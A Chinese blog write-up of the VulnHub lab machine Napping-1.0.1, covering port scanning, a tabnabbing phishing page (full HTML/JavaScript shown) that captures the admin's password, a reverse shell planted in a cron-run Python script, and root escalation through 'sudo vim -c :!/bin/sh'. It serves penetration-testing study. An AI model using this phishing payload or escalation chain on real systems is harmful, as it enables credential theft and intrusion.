渗透测试学习之靶机napping-1.0.1

最新推荐文章于 2024-06-05 19:00:00 发布
最新推荐文章于 2024-06-05 19:00:00 发布
阅读量1.1k 收藏 3
点赞数 1
分类专栏: 安全 文章标签: 安全 web安全 网络 渗透测试 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xdbzdgx/article/details/124515373
版权

前期准备

1.下载靶机Napping-1.0.1WebGOAT: 1 ~ VulnHub

1.载入vmware,网络模式设置为NAT

kali IP地址为192.168.88.128

靶机 IP地址为192.168.88.129

一 、信息收集

1.使用nnamp扫描器扫描开放的端口

nmap -T4 -sV -p- 192.168.88.129

发现开放了80端口和22远程控制端口

2.寻找web信息

 

访问后发现需要登录,随即注册账号并登录。

 

此处指出可以发送自定义的链接,并且所有的链接都将被管理员审核。

我们在此处输入https://www.baidu.com,点击发送

发现此处有个超级链接,点击后跳转到baidu.com。接着查看前端代码。

 

发现了我们输入的URL被嵌入了该页面并且作为跳转地址,而且target=_blank,表明是在新的地址跳转而且没有审核。综上我们尝试tap nabbing钓鱼攻击。

二、漏洞验证

1.tap nabbing攻击

tap nabbing是钓鱼攻击漏洞的一种类型,也叫做反向标签劫持攻击。

该靶机的应用思路是:该正常页面为A,构造一个链接(B),在B中包含调转地址C(C是我们仿造和A相似的地址)

A:http://192.168.88.129/welcome.php

B :http://192.168.88.128/fish.html

fish.html的内容为:

<!DOCTYPE html> <html> <body> <script> if(window.opener) window.opener.parent.location.replace('http://192.168.88.129:1234/index.html'); if(window.opener != window) window.opener.parent.location.replace('http://192.168.88.129:1234/index.html'); </script> </body> </html>

其中index.html 是从网站下载的首页 wget http://192.168.88.128/index.php(端口随意)

C: http://192.168.88.129:1234/index.html

我们在A页面提交跳转的页面B,该网站的管理员会对其进行审核,也就是当管理员打开B的时候,B中包含的parent.location.replace会将实际访问地址和网页标签替换成C。由于C和A页面是相似的,管理员很容易以为C就是正常A的页面,看到此时是未登录状态,就会输入账号密码登录。如果我们在kali上检测C的1234端口访问记录,那么就会接收到管理员的账号密码,达到钓鱼效果。

简单来说,就是利用了人的心理,人正常会对初次打开的页面有警惕,但是在浏览的过程中,对新跳转的网页失去警惕心,tabnapping就是利用用户暂时离开该网页的时候,把伪造一个相似的网页,诱导用户输入个人信息。

2.实际操作

将fish.html和index.php放入kali的tmp目录,并开启web服务

同时开启1234端口监听

在网页输入http://192.168.88.128/fish.html,并且提交

 

这个时候等待管理员审核我们提交的网页(该靶机内是设置了访问程序用于模拟该操作)

几分钟后,发现有数据包,数据包下方有管理员的账号密码

username=danielpassword=C@ughtm3napping123

使用该密码远程登录靶机

查找可以越权的文件和命令

sudo -l 没有权限

id 可以看到属于adminstrators组

接着查找adminstrators组可以执行的命令或文件

find / -group administrators -type f 2>/dev/null

 

发现存在一个python文件,进入该目录下查看

 

三个文件,user.txt没有权限,site_status.txt是query.py的运行记录,记录了query.py每隔2分钟执行一次。query,py功能是检查虚机状态,可编辑。

思路就出来了,利用query.py文件执行反弹shell命令,反弹一个权限更高的shell。

三 漏洞利用

1 提权

首先在daniel目录下创建tesh.sh文件,写入反弹shell指令

为啥补直接在adrian目录下创建呢,因为没有权限。

接着在query.py下写入执行tesh.sh命令

为啥不直接在py文件中写入python的反弹shell语句呢,我试了,没成功,估计是import问题,在靶机本地库里有os,我们才能成功。写入之后,保存,等待两分钟.

 

发现反弹回了一个shell。

sudo -l 发现可以vim命令可以免密码执行root权限。那就可以利用vim直接写入shell

写入命令行:sudo /usr/bin/vim -c ':!/bin/sh’

稍等几秒钟,弹出一个shell

id 发现是root权限了

cd /root 发现目录,至此成功

小豆饼
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
构建完善的安全渗透测试环境:推荐工具、资源和下载链接
weixin_43263566的博客
02-14 3586
安全渗透环境准备(工具下载)
Vulnhub项目:NAPPING: 1.0.1
Ays.Ie的博客
05-07 744
Vulnhub项目:NAPPING: 1.0.1
vulnhub靶机Napping1.0.1教程
m0_73248913的博客
07-18 330
vulnhub靶场
Vulnhub靶场:NAPPING: 1.0.1
最新发布
weixin_69670995的博客
06-05 1272
发现a连接出现了刚刚输入的url,猜测这是一个社工,可以写一个钓鱼页面,新建一个b.html文件,将下面的代码写入。将靶机导入到Oracle VM VirtualBox中,网络设置仅主机模式,和kali使用相同的网卡。发现该py程序每两分钟执行一次,这里在用户的家目录下新建一个shell.sh文件。然后新建一个a.html文件,下面代码写入(写一个正常的页面就行)发现一个a连接,输入一个url再次查看网页源代码。发现22端口和80端口,使用浏览器访问80端口。发现是一个登陆页面,首先进行注册。
vulnhub——napping-1.0.1靶机
Re1_zf的博客
11-01 1202
首先,创建一个反弹shell的sh文件,这里需要注意路径需要在当前用户目录下,否则没有权限创建文件。大概内容就是只要本地web服务可以正常访问,就每隔两分钟向日志文件中写入当前时间。修改一下py执行文件的内容,使其执行编辑好的反弹shell的脚本。这样的话,借助这个py文件,我们可以尝试向攻击机反弹shell。等待一会儿后会有一个shell反弹过来,同时查看一下权限。这里需要注意一下,返回的数据包需要进行一下URL解码。看一下这个目录下的执行日志,大概就是两分钟执行一次。查找一下这个组有权限运行的程序。
Napping靶机渗透测试记录
Jach1n
01-31 254
Napping靶机渗透测试记录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
2020最新渗透测试靶机和工具及教程
05-30
搜集的渗透测试的靶场,有Bwapp综合靶场练习 webug综合靶场练习 DVWA综合靶场练习 pikachu靶场练习 uploads文件练习 SQlilabs注入练习 ZVulDirll综合靶场,全部封装在虚拟机中,渗透工具封装在另一虚拟机中。
渗透测试 靶机环境下载
zhyuxue的博客
09-09 1322
下载Linux应用程序虚拟机、Windows下载、metasploit下载。
DC-5靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
07-30 2753
dc-5靶场详细渗透过程
napping靶场渗透记录
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
10-04 488
napping靶场渗透记录 Even admins can fall asleep on the job
靶机渗透练习17-Red
hirak0的博客
04-16 1795
靶机描述 靶机地址:https://www.vulnhub.com/entry/napping-101,752/ Description Even Admins can fall asleep on the job This works better with VirtualBox rather than VMware ## Changelog v1.0.1 - 2021-10-30 v1.0.0 - 2021-10-22 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机
渗透测试学习靶机DC-5
xdbzdgx的博客
11-18 5592
1.下载靶机 本篇文章是DC靶机系列的第五篇,针对的是靶机DC-5,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-5的下载地址为DC: 5 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 同样地,DC-5只有一个flag。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到roo.
oscp——In Plain Sight: 1.0.1
王嘟嘟的博客
02-11 392
0x00 前言 这个是第29台机子,难度感觉不在题目,而在脑洞和细心。 0x01 信息收集 0x02 端口 ftp这里找到了一点东西,有一个文件,翻译一下 0x03 Web 访问之后发现是一个WP的站 绑定下host 对wp站进行一个扫描找到一个账号 但是我爆破半天没反应。之后在默认页面看到了 index.htnl,注意是 index.htnl 看到了一张图片 点击之后到了这里 上...
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6213
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件提权 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
如何删除导入napping
05-26
如果您想删除已导入的Python模块`napping`,可以使用以下命令: ``` pip uninstall napping ``` 这将从Python环境中删除`napping`模块及其依赖项。请注意,您需要在命令行中执行此命令,并确保您具有足够的权限来卸载模块。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值